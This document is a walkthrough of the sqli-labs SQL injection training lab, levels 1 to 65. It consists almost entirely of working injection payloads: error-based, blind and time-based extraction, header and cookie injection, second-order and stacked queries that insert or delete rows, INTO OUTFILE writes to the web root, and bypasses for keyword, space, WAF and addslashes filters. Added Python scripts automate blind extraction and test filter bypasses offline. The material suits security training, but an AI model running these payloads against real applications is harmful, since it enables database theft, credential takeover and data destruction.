Lesson-1
GET - Error based - Single quotes - String (error-based single-quote string injection)
?id=1'
?id=1'%23
Lesson-2
GET - Error based - Integer based (error-based GET integer injection)
?id=1 and 1=1
?id=1 and 1=2
Lesson-3
GET - Error based - Single quotes with twist - string (error-based GET single-quote injection; the query wraps the value in parentheses, so the boolean test below still parses)
?id=1'
?id=1' and '1'='2
Lesson-4
GET - Error based - Double Quotes - String (error-based GET double-quote injection)
?id=1" and "1"="1
?id=1" and "1"="2
Lesson-5
GET - Double injection - Single Quotes - String (double-query error-based single-quote injection)
?id=1' and updatexml(1,concat(0x7e,version(),0x7e),1)%23
?id=1' or extractvalue(1, concat(0x7e, version())) %23
Lesson-6
GET - Double injection - Double Quotes - String (double-query error-based double-quote injection)
?id=1" and updatexml(1,concat(0x7e,version(),0x7e),1)%23
Lesson-7
GET - Dump into outfile - String (GET injection that writes a file with INTO OUTFILE)
Prerequisite: my.ini sets secure_file_priv='' and tmpdir="C:/phpstudy/PHPTutorial/WWW". secure_file_priv is the setting that matters (an empty value lets the server write anywhere); the MySQL account also needs the FILE privilege and the MySQL service must be able to write into the web root.
?id=1')) union select null,null,'' into outfile "C:/phpstudy/PHPTutorial/WWW/sqli-labs/eval.php" -- +
The query wraps id as (('...')), hence the ')) closure; the string in the third column is the content that ends up in eval.php.
Lesson-8
GET - Blind - Boolean Based - Single Quotes (boolean-based single-quote blind injection)
?id=1' and length(database()) > 4 and '1'='1
Lesson-9
GET - Blind - Time based - Single Quotes (time-based single-quote blind injection)
Time-based blind injection: the only signal is whether the response is delayed.
?id=1' and sleep(5) -- +
?id=1' and if(length(database())=8, sleep(5), 1) -- +   (guess the database name length)
?id=1' and if(left(database(), 1)='s', sleep(5), 1) -- +   (guess the database name one character at a time)
Lesson-10
GET - Blind - Time based - double quotes (time-based double-quote blind injection)
?id=1" and sleep(5) -- +
Lesson-11
POST - Error Based - Single quotes String (error-based POST single-quote injection)
uname=admin' and extractvalue(1, concat(0x7e,(select database()))) and '1'='1&passwd=123456&submit=Submit   (database name)
uname=admin' and extractvalue(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '1'='1&passwd=123456&submit=Submit   (table names)
Lesson-12
POST - Error Based - Double quotes - String - with twist (error-based POST double-quote injection with parentheses)
Double quotes plus parentheses: select * from xxx where uname=("$uname") and passwd=("$passwd");
uname=1&passwd=1") union select database(), 2 or ("1&submit=Submit
Lesson-13
POST - Double Injection - Single quotes - String - with twist (POST single-quote-with-parentheses double-query injection)
Single quote plus parentheses
uname=admin') or ('1&passwd=admin&submit=Submit
uname=admin') and updatexml(1,concat(0x7e,version(),0x7e),1) or ('1&passwd=admin&submit=Submit   (version number)
Lesson-14
POST - Double injection - Single quotes - String - with twist (POST double-query injection; despite the lab title, this query uses double quotes)
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and "&passwd=admin&submit=Submit
Lesson-15
POST - Blind - Boolean/time Based - Single quotes (boolean/time-based single-quote POST blind injection)
uname=admin' and sleep(5) -- 1&passwd=ds&submit=Submit
uname=admin' and if(length(database())=8,sleep(5),1)--+&passwd=admin&submit=Submit   (database name length)
uname=admin' and if(substr(database(),1,1)='s',sleep(5),1)--+&passwd=admin&submit=Submit   (database name)
uname=admin' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='r',sleep(5),1)--+&passwd=admin&submit=Submit   (table names)
uname=admin' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),1,8)='password',sleep(5),1)--+&passwd=admin&submit=Submit   (column names; limit 4,1 only reaches a password column because another schema on the author's server also has a users table; add table_schema=database() and walk limit 0,1 / 1,1 / 2,1 for the lab's id, username, password)
uname=admin' and if(substr((select password from users order by id limit 0,1),1,4)='dumb',sleep(5),1)--+&passwd=admin&submit=Submit   (password values)
uname=admin' and if(substr((select username from users order by id limit 0,1),1,4)='dumb',sleep(5),1)--+&passwd=admin&submit=Submit   (username values)
Note: if() takes exactly three arguments, and substr(x,1,4) compares the first four characters; under the default case-insensitive collation 'dumb' matches the lab's Dumb.
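Automating the Lesson-9 and Lesson-15 style probes (the same approach applies to the blind challenges in Levels 62 to 65). The Python script below is an added example, not code from this page or from sqli-labs: it sends the same if(<condition>,sleep(5),1) payload shape, but drives it with a binary search over the ASCII range instead of guessing one value per request, and replaces the live target with a constructed mock (mock_target, which pretends database() is security) so that it runs offline. The payload template, the helper names and the mock are assumptions; for a live lab, mock_target would be replaced by an HTTP request that measures the response time.

```python
import re

# Constructed stand-in for the lab: what database() returns on the mock target.
DB_NAME = "security"
DELAY = 5                      # seconds the sleep() branch costs on a live target
STATS = {"requests": 0}        # how many probes the last extraction needed

# The two condition shapes this script emits, as the mock must evaluate them.
LEN_RE = re.compile(r"length\(database\(\)\)>(\d+)")
CHR_RE = re.compile(r"ascii\(substr\(database\(\),(\d+),1\)\)>(\d+)")


def mock_target(uname: str) -> float:
    """Simulate the response time of the Lesson-15 login form for one uname value.

    The real query is  SELECT ... WHERE username='$uname' ...  so a value of
    admin' and if(<cond>,sleep(5),1)--+  delays the response iff <cond> is true.
    This mock is a constructed stand-in: it parses the condition and evaluates it
    against DB_NAME instead of sending the request.
    """
    m = re.search(r"if\((.*?),sleep\((\d+)\),1\)", uname)
    if not m:
        return 0.1
    cond, delay = m.group(1), int(m.group(2))
    lm, cm = LEN_RE.fullmatch(cond), CHR_RE.fullmatch(cond)
    if lm:
        true = len(DB_NAME) > int(lm.group(1))
    elif cm:
        pos, val = int(cm.group(1)), int(cm.group(2))
        true = pos <= len(DB_NAME) and ord(DB_NAME[pos - 1]) > val
    else:
        raise ValueError(f"mock cannot evaluate: {cond}")
    return delay + 0.1 if true else 0.1


def oracle(condition: str) -> bool:
    """Send one time-based probe and decide true/false from the delay."""
    STATS["requests"] += 1
    payload = f"admin' and if({condition},sleep({DELAY}),1)--+"
    return mock_target(payload) >= DELAY


def extract_int(cond_template: str, lo: int, hi: int) -> int:
    """Binary-search the integer x in [lo, hi] at which 'value > x' turns false.

    cond_template has one {} placeholder for the probe value. Each iteration
    halves the range, so a character in 0..127 costs 7 requests instead of
    up to 127 with the one-guess-per-request payloads above.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(cond_template.format(mid)):   # value > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def dump_database_name() -> str:
    """Recover database() character by character, the way the manual probes do."""
    STATS["requests"] = 0
    length = extract_int("length(database())>{}", 0, 64)
    chars = [chr(extract_int(f"ascii(substr(database(),{i},1))>{{}}", 0, 127))
             for i in range(1, length + 1)]
    return "".join(chars)


if __name__ == "__main__":
    name = dump_database_name()
    print(f"database() = {name!r} after {STATS['requests']} probes")
```

On a real target each true probe costs the full sleep, so the request count is the cost that matters; with sleep(5) the eight-character name above takes about a minute of waiting instead of the several minutes a linear scan would need, and the same extract_int works unchanged for table, column and row values by swapping the expression in the template.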
Lesson-16
POST - Blind - Boolean/Time Based - Double quotes (boolean/time-based double-quote POST blind injection)
Double quotes; the query wraps the value in parentheses, so the Lesson-15 probes work once the closure is changed to ") ... -- +, e.g. uname=admin") and sleep(5)-- +&passwd=admin&submit=Submit
Lesson-17
POST - Update Query - Error Based - String (error-based POST injection into an UPDATE query)
Prerequisite: uname must be an existing user. The injection goes in the new password, which is spliced into UPDATE users SET password='...' WHERE username='...'.
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','user','first_name','last_name','avatar','last_login','failed_login')),0x7e),1) --+ &submit=Submit
The not in (...) list hides the columns of a same-named users table in another schema on the author's server; adding table_schema=database() is the cleaner filter. Because --+ comments out the WHERE clause, a payload in this position that did not raise an error would overwrite every password in the table, so keep the error-raising function in an UPDATE.
Level-18
POST - Header Injection - Uagent field - Error Based (error-based injection through the User-Agent header)
Prerequisite: uname and passwd must be a valid login; the User-Agent is then inserted into the uagents table.
User-Agent: ' and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) and '
uname=admin&passwd=admin&submit=Submit
Level-19
POST - Header Injection - Referer field - Error based (error-based injection through the Referer header)
Prerequisite: uname and passwd must be a valid login.
Referer: ' and extractvalue(1, concat(0x7e, database(), 0x7e)) and '
uname=admin&passwd=admin&submit=Submit
Level-20
POST - Cookie Injection - Uagent field error based (error-based injection through the uname cookie)
Cookie: uname=admin' and extractvalue(1, concat(0x7e, database(), 0x7e)) and '
Level-21
Cookie Injection - base64 encoded - single quotes and parenthesis (cookie injection, base64-encoded value, single quote with parentheses)
-admin') union select 1,2,database()#   (the leading - makes the original WHERE match no row, so the union row is the one displayed)
Cookie: uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==
Level-22
Cookie injection - base64 encoded - double quotes (cookie injection, base64-encoded value, double quotes)
admin" and extractvalue(1, concat(0x7e,database(),0x7e)) #
Cookie: uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSwgY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSkgIw==
Level-23
GET - Error based - strip comments (error-based GET injection with comment characters filtered)
Comment characters are stripped, so instead of commenting out the tail of the query, close it with a matching quote.
?id=0' union select 1,concat(database(),0x20,@@basedir,0x20,user()),'
The trailing ' pairs with the query's own closing quote, leaving an empty string as the third column.
Level-24
POST - Second order injection Real treat - Stored injections
The application has three functions: register, log in, change password.
First, register an account named admin'# with password xiaoming.
Then log in as admin'#.
Finally, change the password: the new password lands on the admin account, because the stored username is concatenated unescaped into UPDATE ... WHERE username='admin'#...' and # comments out the rest of the WHERE clause.
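A runnable model of the Level-24 flow, added here as an example rather than taken from the lab's code. It uses Python's built-in sqlite3 so it runs offline; since SQLite has no # comment, the registered username is admin'-- instead of admin'#, which plays the same role. The registration and login queries are parameterised (that is why the payload is stored intact), and only the change-password UPDATE concatenates the username read back from the session, which is exactly the mistake second-order injection relies on. Table layout, helper names and the "original" password are constructed for the demo.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed fixture: one legitimate admin account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'original-admin-pw')")
    return con


def register(con, username: str, password: str) -> None:
    # Parameterised: the quote in the username is stored literally, not executed.
    con.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def login(con, username: str, password: str) -> bool:
    row = con.execute("SELECT 1 FROM users WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row is not None


def change_password_vulnerable(con, session_user: str, current: str, new: str) -> str:
    # The username comes from the session, i.e. from the database, and is trusted
    # as "already validated": that is the second-order bug. Returns the SQL it ran.
    sql = (f"UPDATE users SET password='{new}' "
           f"WHERE username='{session_user}' AND password='{current}'")
    con.execute(sql)
    return sql


def change_password_fixed(con, session_user: str, current: str, new: str) -> None:
    # Same statement, parameterised: the stored payload is just a string again.
    con.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                (new, session_user, current))


def run(vulnerable: bool) -> dict:
    """Register admin'--, log in, change the password; report every account's password."""
    con = setup_db()
    attacker = "admin'--"            # the lab uses admin'# (MySQL comment syntax)
    register(con, attacker, "xiaoming")
    assert login(con, attacker, "xiaoming")
    if vulnerable:
        change_password_vulnerable(con, attacker, "xiaoming", "pwned")
    else:
        change_password_fixed(con, attacker, "xiaoming", "pwned")
    return {u: p for u, p in con.execute("SELECT username, password FROM users")}


if __name__ == "__main__":
    print("vulnerable:", run(True))    # admin's password becomes 'pwned'
    print("fixed:     ", run(False))   # only admin'-- changes its own password
```

The vulnerable UPDATE executes as UPDATE users SET password='pwned' WHERE username='admin'-- ..., so the password check is commented away and the row that matches is admin's. Escaping at registration time does not help; the value must be treated as untrusted at every query that uses it, which parameterisation does for free.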
Level-25
GET - Error based - All your OR & AND belong to us - string single quote (error-based single-quote injection with and/or filtered)
Bypass by doubling the keyword: anandd -> and, oorr -> or, because the filter strips each match once and does not rescan. Any word that contains these substrings needs the same treatment (infoorrmation_schema, passwoorrd).
?id=1' AANDND extractvalue(1, concat(0x7e, database(), 0x7e)) Aandnd '1'='1
Level-25a
GET - blind based - All your or & and belong to us - integer based (integer blind injection with or/and filtered)
?id=-1 union select 1,database(),3
Level-26
GET - Error based - All your spaces and comments belong to us (error-based injection with spaces and comment characters filtered)
Spaces, comment characters, slashes and the words or/and are stripped; || and && stand in for or/and, and the value is closed with a matching quote instead of a comment.
?id=0'||updatexml(1,concat(0x7e,database(),0x7e),0)||'1
Level-26a
GET - Blind based - All your SPACES and COMMENTS belong to us - String-single quotes-Parenthesis (blind single-quote-with-parentheses injection with spaces and comments filtered)
%a0 replaces the space: the filter's \s class only matches ASCII whitespace, while MySQL accepts 0xA0 as a token separator in this setup.
?id=0')%a0union%a0select%a01,user(),3||('1
?id=100')%a0union%a0select%a01,database(),3%a0aandnd%a01=('1
Level-27
GET - Error Based - All your UNION & SELECT Belong to us - String Single quote (error-based single-quote injection with UNION/SELECT filtered)
?id=1'%26%26extractvalue(1,concat(0x7e,database(),0x7e))%26%26'1'='1
%26%26 is &&. No SELECT is needed to read database(); where a subquery is needed, use a case variant the filter's literal list does not cover, with %0a in place of spaces.
Level-27a
GET - Blind Based - All your UNION & SELECT Belong to us - Double Quotes (blind double-quote injection with UNION/SELECT filtered)
?id=0"%0AUNIon%0ASELECt%0A1,database(),3||"1"="1
Level-28
GET - Error Based - All your UNION & SELECT Belong to us - String - Single quote with parenthesis (error-based single-quote-with-parentheses injection with UNION/SELECT filtered)
?id=0')%0Aununion%0Aselection%0Aselect%0A1,database(),2||('1'='1
The filter removes one union<whitespace>select match; ununion%0Aselection%0Aselect loses the inner match and leaves union%0Aselect behind.
Level-28a
GET - Blind Based - All your UNION&SELECT Belong to us - single quote - parenthesis (blind single-quote-with-parentheses injection with SELECT/UNION filtered)
?id=0')%0Aununion%0Aselection%0Aselect%0A1,@@datadir,2||('1
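The filters in Levels 25, 26 and 28 are single-pass preg_replace chains, and the bypasses above work because of exactly that. The Python below is an added example, not the lab's PHP: it re-implements those three chains over raw request bytes, so that \s behaves as in PCRE without the u modifier (ASCII whitespace only, 0xA0 untouched), and shows what survives for the payloads listed above. The pattern lists are reproduced from memory of the lab sources and are assumptions to check against your copy; Level 27's list of literal case variants is not modelled.

```python
import re

# Each entry: (PCRE pattern as bytes, flags). Applied once each, in order,
# like a chain of preg_replace($pattern, "", $id) calls.
LESS25 = [(rb"or", re.I), (rb"and", re.I)]
LESS26 = LESS25 + [(rb"[/\*]", 0), (rb"[--]", 0), (rb"[#]", 0),
                   (rb"[\s]", 0), (rb"[/\\]", 0)]
LESS28 = [(rb"[/\*]", 0), (rb"[--]", 0), (rb"[#]", 0), (rb"[ +]", 0),
          (rb"union\s+select", re.I)]


def apply_filter(raw_id: bytes, chain) -> bytes:
    """Run the filter chain the way PHP does: one non-recursive pass per pattern."""
    for pattern, flags in chain:
        raw_id = re.sub(pattern, b"", raw_id, flags=flags)
    return raw_id


def less25_query(raw_id: bytes) -> bytes:
    return b"SELECT * FROM users WHERE id='" + apply_filter(raw_id, LESS25) + b"' LIMIT 0,1"


def less26a_query(raw_id: bytes) -> bytes:
    return b"SELECT * FROM users WHERE id=('" + apply_filter(raw_id, LESS26) + b"') LIMIT 0,1"


def less28_query(raw_id: bytes) -> bytes:
    return b"SELECT * FROM users WHERE id=('" + apply_filter(raw_id, LESS28) + b"') LIMIT 0,1"


if __name__ == "__main__":
    # Constructed inputs, mirroring the payloads above after URL decoding.
    cases = [
        ("Less-25 doubled keywords", less25_query,
         b"1' AANDND extractvalue(1,concat(0x7e,database(),0x7e)) Aandnd '1'='1"),
        ("Less-25 plain and (stripped)", less25_query,
         b"1' and extractvalue(1,concat(0x7e,database(),0x7e)) and '1'='1"),
        ("Less-26a 0xA0 as separator", less26a_query,
         b"0')\xa0union\xa0select\xa01,user(),3||('1"),
        ("Less-26a plain space (stripped)", less26a_query,
         b"0') union select 1,user(),3||('1"),
        ("Less-28 nested union select", less28_query,
         b"0')\nununion\nselection\nselect\n1,database(),2||('1'='1"),
    ]
    for label, build, payload in cases:
        print(f"{label}: {build(payload)!r}")
```

The common fault is that every pattern runs once and the output is never re-checked: removing a match can create a new one. The same test harness is useful against any blacklist filter you meet; feed it the filter's exact patterns and iterate on payloads offline before touching the target.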
Level-29
GET - Error based - IMPIDENCE MISMATCH - Having a WAF in front of web application (error-based injection behind a WAF)
?id=0' union select 1,@@datadir,database() -- 1
Level-30
GET - Blind - IMPIDENCE MISMATCH - Having a WAF in front of web application (blind injection behind a WAF)
?id=1" and length(database()) >7 and "1
Level-31
GET - Blind - IMPIDENCE MISMATCH - Having a WAF in front of web application (blind injection behind a WAF)
?id=1" and length(database()) > 7 and "1
Level-32
GET - Bypass custom filter adding slashes to dangerous chars (bypassing a filter that backslash-escapes special characters)
Wide-byte bypass of quote escaping. A character such as 我 is a multibyte sequence (%E6%88%91 in UTF-8). With ?id=-1%E6' the filter prepends a backslash (0x5C) to the quote, and because the connection charset is GBK the server reads %E6 followed by 0x5C as a single two-byte character. It is not a meaningful character, but it consumes the backslash, and the quote that follows is no longer escaped.
?id=0%E6%27%20union%20select%201,database(),user()%20--%201
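What the wide-byte trick does to the bytes, as an added Python example rather than code from this page or from sqli-labs; the same mechanism is behind Levels 33, 34, 36 and 37. It models addslashes() on the raw request bytes, then decodes the resulting query the way a GBK connection (the lab's SET NAMES gbk) and a UTF-8 connection would. The query template and helper names are assumptions for illustration; the demo uses the canonical %DF lead byte because 0xDF5C is a well-known valid GBK code, and the page's %E6 behaves the same way since 0xE65C is also a valid GBK two-byte code.

```python
from urllib.parse import unquote_to_bytes

QUERY_PREFIX = b"SELECT * FROM users WHERE id='"   # assumed Less-32 style template
QUERY_SUFFIX = b"' LIMIT 0,1"


def addslashes_bytes(data: bytes) -> bytes:
    """PHP addslashes() on raw bytes: a backslash before ' \" \\ and NUL.

    It works byte by byte with no knowledge of the character set, which is
    the root of the problem.
    """
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(url_encoded_id: str) -> bytes:
    """Decode ?id=... as PHP would, escape it, splice it into the SQL bytes."""
    return QUERY_PREFIX + addslashes_bytes(unquote_to_bytes(url_encoded_id)) + QUERY_SUFFIX


def as_seen_by_mysql(query: bytes, connection_charset: str) -> str:
    """The server tokenises the bytes under the connection charset, not as raw bytes."""
    return query.decode(connection_charset, errors="replace")


def quote_still_escaped(url_encoded_id: str, connection_charset: str) -> bool:
    """True when every single quote inside the injected value is still preceded
    by a backslash after the server has decoded the query."""
    text = as_seen_by_mysql(build_query(url_encoded_id), connection_charset)
    inner = text[len(QUERY_PREFIX):-len(QUERY_SUFFIX)]   # both ends are ASCII
    return all(i > 0 and inner[i - 1] == "\\"
               for i, ch in enumerate(inner) if ch == "'")


if __name__ == "__main__":
    payload = "0%df%27 union select 1,database(),user()-- +"
    for charset in ("gbk", "utf-8"):
        print(charset, quote_still_escaped(payload, charset),
              as_seen_by_mysql(build_query(payload), charset))
```

Under gbk the escaped value decodes to one CJK character followed by a bare quote, so the union runs; under utf-8 the lone 0xDF becomes a replacement character and the backslash still escapes the quote. The fix is not a better escaper but charset-aware escaping: mysql_set_charset('gbk') before mysql_real_escape_string(), or better a utf8mb4 connection and prepared statements, which removes the class of bug entirely.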
Level-33
GET - Bypass AddSlashes() (bypassing addslashes() over GET)
?id=0%E6%27%20union%20select%20database(),%20user(),%20version()--%20+
Level-34
POST - Bypass AddSlashes() (bypassing addslashes() over POST)
uname=12%E6' union select @@datadir, database() -- +&passwd=2&submit=Submit
Level-35
GET - Bypass Add Slashes (we don't need them) integer based (integer injection; the escaping is irrelevant because no quote is needed)
?id=0 union select 1, database(), user()
Level-36
GET - Bypass MYSQL_real_escape_string (bypassing mysql_real_escape_string() over GET)
?id=0%E6%27%20%20union%20select%201,database(),2--%201
Level-37
POST - Bypass MYSQL_real_escape_string (bypassing mysql_real_escape_string() over POST)
uname=12%E6' union select @@datadir, database() -- +&passwd=2&submit=Submit
Level-38
Future Editions
?id=0' union select 1, database(), user() -- +
or a stacked query:
?id=0';delete from users where id=17 -- +   (use the injectable id to insert, modify or delete data)
PART3
Level-38
GET - Stacked Query Injection - String (stacked query injection)
?id=1';insert into users(id,username,password) values (77,'test','test')--+
Level-39
GET - Stacked Query Injection - Integer based (integer stacked query injection)
?id=1;insert into users(id,username,password) values (17,'test','test')--+
Level-40
GET - Blind based - String - stacked (blind stacked injection, single quote with parentheses)
?id=1');insert into users(id,username,password) values (18,'test','test')--+
Level-41
GET - Blind based - Integer - stacked (integer blind stacked injection)
?id=1;insert into users(id,username,password) values (19,'a','b') -- +
Level-42
POST - Error based - String - Stacked (error-based POST stacked injection)
login_user=21&login_password=21';insert into users(id,username,password) values (20,'a','b') -- +&mysubmit=Login
Level-43
POST - Error based - String - Stacked with twist (error-based POST stacked injection with parentheses)
login_user=12&login_password=12');delete from users where id=20 -- +&mysubmit=Login
Level-44
POST - Error based - String - Stacked - Blind (POST blind stacked injection)
login_user=12&login_password=12';delete from users where id=19 -- +&mysubmit=Login
Level-45
POST - Error based - String - Stacked - Blind (POST blind stacked injection with parentheses)
login_user=12&login_password=2112');delete from users where id=18 -- +&mysubmit=Login
Level-46
GET - Error based - Numeric - ORDER BY CLAUSE (ORDER BY injection)
?sort=1 and extractvalue(1,concat(0x3c,(select @@datadir)))   (read the result from the page source: 0x3c is <, so the browser treats the output as a tag and hides it)
Level-47
GET - Error based String - ORDER BY CLAUSE (error-based string ORDER BY injection)
/?sort=1' and extractvalue(1,concat(0x3c,(select @@datadir))) and '1
Level-48
GET - Error based - Blind - Numeric - ORDER BY CLAUSE (numeric blind ORDER BY injection)
?sort=rand(ascii(left(database(),1))=116)   (rand(true) and rand(false) are different seeds and give different row orders; compare with the order for a condition known to be true)
Level-49
GET - Error based - string - blind ORDER BY CLAUSE
?sort=1' and if((ascii(substr(database(),1,1)))>0,sleep(1),1) --+
sleep here takes longer than the requested time because ORDER BY evaluates the expression once per row.
Level-50
GET - Error based - ORDER BY CLAUSE - numeric Stacked injection
?sort=rand(ascii(left(database(),1))=115)
Level-51
GET - Error based - ORDER BY CLAUSE - String - Stacked injection
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23
Level-52
GET - Blind based - ORDER BY CLAUSE - numeric Stacked injection
?sort=1;create table less52 like users
Level-53
GET - Blind based - ORDER BY CLAUSE - string stacked injection
?sort=1';create table less53 like users%23
PART4
Level-54
GET - challenge - Union - 10 queries allowed - Variation 1
?id=0' union select 1,database(),user()%23
Level-55
GET - challenge - Union - 14 queries allowed - Variation 2
?id=1)%23
?id=0) union select 1,database(),user() %23
Level-56
GET - challenge - Union - 14 queries allowed - Variation 3
?id=0') union select 1, database(), user() %23
Level-57
GET - challenge - Union - 14 queries allowed - Variation 4
?id=0" union select 1, database(), 3 %23
Level-58
GET - challenge - Double Query - 5 queries allowed - Variation 1
?id=1' and updatexml(1, concat(0x7e, database(), 0x7e), 1) %23
Level-59
GET - challenge - Double Query - 5 queries allowed - Variation 2
?id=99 and updatexml(1,concat(0x7e,database(),0x7e),1)
Level-60
GET - challenge - Double Query - 5 queries allowed - Variation 3
?id=1" and extractvalue(1,concat(0x7e,database(),0x7e)) and "1
Level-61
GET - challenge - Double Query - 5 queries allowed - Variation 4
?id=1' and extractvalue(1,concat(0x7e,database(),0x7e)) and '1
Level-62
GET - challenge - Blind - 130 queries allowed - Variation 1
?id=1') and (length(database())=10)%23
Level-63
GET - challenge - Blind - 130 queries allowed - Variation 2
?id=1' and (length(database())=10)%23
Level-64
GET - challenge - Blind - 130 queries allowed - Variation 3
?id=1)) and (length(database())=10)%23
Level-65
GET - challenge - Blind - 130 queries allowed - Variation 4
?id=1") and (length(database())=10)%23